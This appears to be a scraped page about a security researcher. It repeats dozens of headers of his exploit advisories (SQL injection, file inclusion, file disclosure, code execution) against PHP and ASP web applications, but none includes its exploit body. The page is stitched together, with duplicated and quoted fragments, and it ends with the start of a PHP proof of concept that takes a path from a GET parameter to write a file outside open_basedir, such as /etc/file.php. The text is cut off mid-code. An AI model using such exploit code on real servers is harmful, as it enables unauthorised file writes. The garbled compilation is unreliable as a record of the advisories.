Sina Yazdanmehr
On Thu, Dec 04, 2008 at 08:20:16AM -0700, r3d.w0rm@yahoo.com wrote:
> #####################################################################################
> #### Joomla Component GameQ ####
> #####################################################################################
> # #
> #AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
> #Discovered by : Sina Yazdanmehr (R3d.W0rm) #
> #Our Site : Http://IRCRASH.COM #
> #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
> #####################################################################################
> # #
#####################################################################################
#### PHP-Nuke 8.0 Downloads Blind Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
#####################################################################################
#### PHP-Fusion Mod Members Bewerb Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#####################################################################################
#### PHP-Fusion Mod E-Cart Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#####################################################################################
#### Meta Cart Free Database Disclosure ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### Stash v1.0.3 Admin bypass / Remote File Disclosure ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#!/usr/bin/python
#####################################################################################
#### minb Remote Code Execution Exploit ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#####################################################################################
#### eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#####################################################################################
# UNAK-CMS Lfi
#####################################################################################
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : Http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#####################################################################################
#
#####################################################################################
#### MyClan Sql Injection
#####################################################################################
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : Http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#####################################################################################
#
################################################################################
#### Ovidentia Sql Injection
################################################################################
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : Http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
################################################################################
#
# -*- coding: cp1256 -*-
#####################################################################################
#### munky-bliki Lfi ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#####################################################################################
#### NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#####################################################################################
#### Mavi Emlak Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#####################################################################################
#### Arab Portal v2.1 Remote File Disclosure (Win32) ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
#Discovered by : R3d.W0rm (Sina Yazdanmehr) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### Bugs Online v2.14 Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
#####################################################################################
#### Madrese-Portal Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#####################################################################################
#### Joomla Component mydyngallery ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### boastMachine v3.1 Remote Sql Injection ####
#####################################################################################
# #
#AUTHOR : R3d.W0rm (Sina Yazdanmehr) #
#Discovered by : R3d.W0rm (Sina Yazdanmehr) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### Joomla Component GameQ ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
: # -*- coding: cp1256 -*-
: #####################################################################################
: #### munky-bliki Lfi ####
: #####################################################################################
: # #
: #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
: #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #
: #Our Site : Http://IRCRASH.COM #
: #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #
: #####################################################################################
: # #
#####################################################################################
#### aspProductCatalog Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### PHP-Fusion Mod TI - Blog System Sql Injection ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
# #
#####################################################################################
#### facto Database Disclosure ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### ASP-CMS v.1.0 Sql Injection/Database Disclosure ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi #
#####################################################################################
# #
#####################################################################################
#### Asp-project Cookie Handling ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
>
> My Official Website : HTTP://FEREIDANI.IR
>
> Team Website : Http://IRCRASH.COM
>
> Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr
>
> Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
>
> ----------------------------------------------------------------
>
open_basedir .
Reproduce code:
---------------
<?php
// Author : Sina Yazdanmehr (R3d.W0rm) ; Our Site : http://IrCrash.com
if(!extension_loaded('pdf')){
die('pdf extension required .');
}else{
$__PATH = $_GET['p']; /*The path that u want save file in .ex:
/etc/file.php*/
|
